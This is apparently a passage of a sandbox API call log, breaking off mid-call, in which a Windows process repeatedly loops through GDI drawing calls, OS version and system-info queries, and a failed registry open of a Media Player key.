[0087.638] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.638] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.638] BeginPath (hdc=0x0) returned 0 [0087.638] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.638] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.638] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.638] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.639] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c0401cd [0087.639] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a0401d0 [0087.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f1 [0087.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f2 [0087.639] CombineRgn (hrgnDst=0x10408f1, hrgnSrc1=0x5c0401cd, hrgnSrc2=0x5a0401d0, iMode=1) returned 1 [0087.639] CombineRgn (hrgnDst=0x10408f2, hrgnSrc1=0x5c0401cd, hrgnSrc2=0x5a0401d0, iMode=4) returned 2 [0087.639] CreateSolidBrush (color=0xff) returned 0x21008f0 [0087.639] CreateSolidBrush (color=0xff0000) returned 0x11008f3 [0087.639] DeleteObject (ho=0x11008f3) returned 1 [0087.639] DeleteObject (ho=0x5a0401d0) returned 1 [0087.639] DeleteObject (ho=0x5c0401cd) returned 1 [0087.639] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.639] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.639] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.639] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.639] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.639] BeginPath (hdc=0x0) returned 0 [0087.639] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.639] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.639] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.639] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.639] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.639] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.639] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.639] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.639] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b0401d0 [0087.639] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d0401cd [0087.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f4 [0087.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f5 [0087.639] CombineRgn (hrgnDst=0x10408f4, hrgnSrc1=0x5b0401d0, hrgnSrc2=0x5d0401cd, iMode=1) returned 1 [0087.639] CombineRgn (hrgnDst=0x10408f5, hrgnSrc1=0x5b0401d0, hrgnSrc2=0x5d0401cd, iMode=4) returned 2 [0087.639] CreateSolidBrush (color=0xff) returned 0x21008f3 [0087.639] CreateSolidBrush (color=0xff0000) returned 0x11008f6 [0087.639] DeleteObject (ho=0x11008f6) returned 1 [0087.639] DeleteObject (ho=0x5d0401cd) returned 1 [0087.639] DeleteObject (ho=0x5b0401d0) returned 1 [0087.639] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.639] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.639] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.640] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.640] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.640] BeginPath (hdc=0x0) returned 0 [0087.640] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.640] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.640] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.640] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.640] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.640] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e0401cd [0087.640] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c0401d0 [0087.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f7 [0087.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f8 [0087.640] CombineRgn (hrgnDst=0x10408f7, hrgnSrc1=0x5e0401cd, hrgnSrc2=0x5c0401d0, iMode=1) returned 1 [0087.640] CombineRgn (hrgnDst=0x10408f8, hrgnSrc1=0x5e0401cd, hrgnSrc2=0x5c0401d0, iMode=4) returned 2 [0087.640] CreateSolidBrush (color=0xff) returned 0x21008f6 [0087.640] CreateSolidBrush (color=0xff0000) returned 0x11008f9 [0087.640] DeleteObject (ho=0x11008f9) returned 1 [0087.640] DeleteObject (ho=0x5c0401d0) returned 1 [0087.640] DeleteObject (ho=0x5e0401cd) returned 1 [0087.640] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.640] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.640] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.640] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.640] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.640] BeginPath (hdc=0x0) returned 0 [0087.640] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.640] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.640] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.640] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.640] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.640] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d0401d0 [0087.640] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f0401cd [0087.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408fa [0087.641] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408fb [0087.641] CombineRgn (hrgnDst=0x10408fa, hrgnSrc1=0x5d0401d0, hrgnSrc2=0x5f0401cd, iMode=1) returned 1 [0087.641] CombineRgn (hrgnDst=0x10408fb, hrgnSrc1=0x5d0401d0, hrgnSrc2=0x5f0401cd, iMode=4) returned 2 [0087.641] CreateSolidBrush (color=0xff) returned 0x21008f9 [0087.641] CreateSolidBrush (color=0xff0000) returned 0x11008fc [0087.641] DeleteObject (ho=0x11008fc) returned 1 [0087.641] DeleteObject (ho=0x5f0401cd) returned 1 [0087.641] DeleteObject (ho=0x5d0401d0) returned 1 [0087.641] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.641] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.641] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.641] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.641] BeginPath (hdc=0x0) returned 0 [0087.641] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.641] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.641] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.641] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.641] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.641] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.641] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.641] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x600401cd [0087.641] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e0401d0 [0087.641] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408fd [0087.641] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408fe [0087.641] CombineRgn (hrgnDst=0x10408fd, hrgnSrc1=0x600401cd, hrgnSrc2=0x5e0401d0, iMode=1) returned 1 [0087.641] CombineRgn (hrgnDst=0x10408fe, hrgnSrc1=0x600401cd, hrgnSrc2=0x5e0401d0, iMode=4) returned 2 [0087.641] CreateSolidBrush (color=0xff) returned 0x21008fc [0087.641] CreateSolidBrush (color=0xff0000) returned 0x11008ff [0087.641] DeleteObject (ho=0x11008ff) returned 1 [0087.641] DeleteObject (ho=0x5e0401d0) returned 1 [0087.641] DeleteObject (ho=0x600401cd) returned 1 [0087.641] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.641] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.641] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.641] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.641] BeginPath (hdc=0x0) returned 0 [0087.641] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.642] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.642] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.642] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.642] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f0401d0 [0087.642] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x610401cd [0087.642] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040900 [0087.642] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040901 [0087.642] CombineRgn (hrgnDst=0x1040900, hrgnSrc1=0x5f0401d0, hrgnSrc2=0x610401cd, iMode=1) returned 1 [0087.642] CombineRgn (hrgnDst=0x1040901, hrgnSrc1=0x5f0401d0, hrgnSrc2=0x610401cd, iMode=4) returned 2 [0087.642] CreateSolidBrush (color=0xff) returned 0x21008ff [0087.642] CreateSolidBrush (color=0xff0000) returned 0x1100902 [0087.642] DeleteObject (ho=0x1100902) returned 1 [0087.642] DeleteObject (ho=0x610401cd) returned 1 [0087.642] DeleteObject (ho=0x5f0401d0) returned 1 [0087.642] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.642] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.642] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.642] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.642] BeginPath (hdc=0x0) returned 0 [0087.642] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.642] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.642] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.642] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.643] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x620401cd [0087.643] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x600401d0 [0087.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040903 [0087.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040904 [0087.643] CombineRgn (hrgnDst=0x1040903, hrgnSrc1=0x620401cd, hrgnSrc2=0x600401d0, iMode=1) returned 1 [0087.643] CombineRgn (hrgnDst=0x1040904, hrgnSrc1=0x620401cd, hrgnSrc2=0x600401d0, iMode=4) returned 2 [0087.643] CreateSolidBrush (color=0xff) returned 0x2100902 [0087.643] CreateSolidBrush (color=0xff0000) returned 0x1100905 [0087.643] DeleteObject (ho=0x1100905) returned 1 [0087.643] DeleteObject (ho=0x600401d0) returned 1 [0087.643] DeleteObject (ho=0x620401cd) returned 1 [0087.643] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.643] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.643] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.643] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.643] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.643] BeginPath (hdc=0x0) returned 0 [0087.643] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.643] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.643] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.643] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.643] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.643] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.643] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x610401d0 [0087.643] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x630401cd [0087.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040906 [0087.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040907 [0087.643] CombineRgn (hrgnDst=0x1040906, hrgnSrc1=0x610401d0, hrgnSrc2=0x630401cd, iMode=1) returned 1 [0087.643] CombineRgn (hrgnDst=0x1040907, hrgnSrc1=0x610401d0, hrgnSrc2=0x630401cd, iMode=4) returned 2 [0087.643] CreateSolidBrush (color=0xff) returned 0x2100905 [0087.643] CreateSolidBrush (color=0xff0000) returned 0x1100908 [0087.643] DeleteObject (ho=0x1100908) returned 1 [0087.643] DeleteObject (ho=0x630401cd) returned 1 [0087.644] DeleteObject (ho=0x610401d0) returned 1 [0087.644] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.644] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.644] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.644] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.644] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.644] BeginPath (hdc=0x0) returned 0 [0087.644] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.644] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.644] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.644] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.644] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.644] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.644] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.644] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.661] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x640401cd [0087.661] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x620401d0 [0087.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095a [0087.662] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104095b [0087.662] CombineRgn (hrgnDst=0x104095a, hrgnSrc1=0x640401cd, hrgnSrc2=0x620401d0, iMode=1) returned 1 [0087.662] CombineRgn (hrgnDst=0x104095b, hrgnSrc1=0x640401cd, hrgnSrc2=0x620401d0, iMode=4) returned 2 [0087.662] CreateSolidBrush (color=0xff) returned 0x2100908 [0087.662] CreateSolidBrush (color=0xff0000) returned 0x110095c [0087.662] DeleteObject (ho=0x110095c) returned 1 [0087.662] DeleteObject (ho=0x620401d0) returned 1 [0087.662] DeleteObject (ho=0x640401cd) returned 1 [0087.662] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.662] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.662] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.662] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.662] BeginPath (hdc=0x0) returned 0 [0087.662] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.662] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.662] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.662] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.662] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.662] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.662] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, 